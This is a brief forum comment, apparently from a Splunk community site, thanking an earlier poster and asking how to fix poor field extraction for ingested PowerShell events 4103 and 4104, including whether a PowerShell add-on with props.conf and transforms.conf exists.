This was VERY helpful - thanks!! I'm finding that the data Splunk ingests for PowerShell events (i.e. 4103, 4104) is very sloppy. Fields are not getting extracted, etc. Any idea on how I can resolve this? There doesn't seem to be a proper "Splunk_TA_PowerShell" with props.conf & tranforms.conf to clean up the PowerShell event data - am I wrong? Let me know if you know of a solution, or good resource. Thanks!
... View more